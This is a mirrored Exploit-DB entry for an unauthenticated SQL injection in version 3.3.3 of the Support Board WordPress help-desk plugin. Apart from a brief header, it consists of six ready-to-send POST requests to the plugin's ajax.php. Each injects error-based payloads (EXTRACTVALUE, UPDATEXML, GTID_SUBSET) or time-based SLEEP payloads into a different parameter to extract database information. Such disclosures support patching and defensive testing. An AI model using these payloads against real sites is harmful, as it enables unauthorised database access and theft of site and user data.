Support Board 3.3.3 – ‘Multiple’ SQL Injection (Unauthenticated)

  • 作者: John Jefferson Li
    日期: 2021-09-15
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50294/
  • # Exploit Title: Support Board 3.3.3 - 'Multiple' SQL Injection (Unauthenticated)
    # Date: 29.08.2021
    # Exploit Author: John Jefferson Li <yiyohwi@naver.com>
    # Vendor Homepage: https://board.support/
    # Software Link: https://codecanyon.net/item/support-board-help-desk-and-chat/20359943
    # Version: 3.3.3
    # Tested on: Ubuntu 20.04.2 LTS
    
    ----- PoC 1: Error Based SQLi (status_code) -----
    
    Request 
    
    POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1
    Vulnerable Parameter: status_code (POST)
    
    function=new-conversation&status_code=2"+AND+EXTRACTVALUE(4597,CONCAT("","DB+Name:+",(SELECT+(ELT(4597=4597,""))),database()))+AND+"fKoo"="fKoo&title=&department=&agent_id=&routing=false&login-cookie=&user_id=46&language=false
    
    
    ----- PoC 2: Error Based SQLi (department)-----
    
    Request 
    
    POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1
    Vulnerable Parameter: department (POST)
    
    function=new-conversation&status_code=2o&title=&department=(UPDATEXML(5632,CONCAT(0x2e,"Database+Name:+",(SELECT+(ELT(5632=5632,""))),database()),3004))&agent_id=&routing=false&login-cookie=&user_id=46&language=false
    
    
    ----- PoC 3: Error Based SQLi (user_id) -----
    
    Request 
    
    POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1
    Vulnerable Parameter: user_id (POST)
    
    function=send-message&user_id=-5"+AND+GTID_SUBSET(CONCAT("Database+Name:+",(SELECT+(ELT(3919=3919,""))),database()),3919)+AND+"wrOJ"="wrOJ&conversation_id=35&message=TEST+POC&conversation_status_code=false&queue=false&payload=false&recipient_id=false&login-cookie=&language=false
    
    
    ----- PoC 4: Time Based SQLi (conversation_id)-----
    
    Request
    
    POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1
    Vulnerable Parameter: conversation_id (POST)
    
    function=send-message&user_id=5&conversation_id=45"+AND+(SELECT 1479+FROM+(SELECT(SLEEP(5)))xttx)--+BOXv&message=test+&conversation_status_code=false&queue=false&payload=false&recipient_id=false&login-cookie=&language=false
    
    
    ----- PoC 5: Time Based SQLi (conversation_status_code)-----
    
    Request
    
    POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1
    Vulnerable Parameter: conversation_status_code (POST)
    
    function=send-message&user_id=5&conversation_id=45&message=test+&conversation_status_code=false+WHERE+9793=9793+AND+(SELECT+4500+FROM+(SELECT(SLEEP(5)))oJCl)--+uAGp&queue=false&payload=false&recipient_id=false&login-cookie=&language=false
    
    
    ----- PoC 6: Time Based SQLi (recipient_id)-----
    
    Request
    
    POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1
    Vulnerable Parameter: recipient_id (POST)
    
    function=send-message&user_id=5&conversation_id=45&message=test+&conversation_status_code=false&queue=false&payload=false&recipient_id=false+AND+(SELECT+7416+FROM+(SELECT(SLEEP(5)))eBhm)&login-cookie=&language=false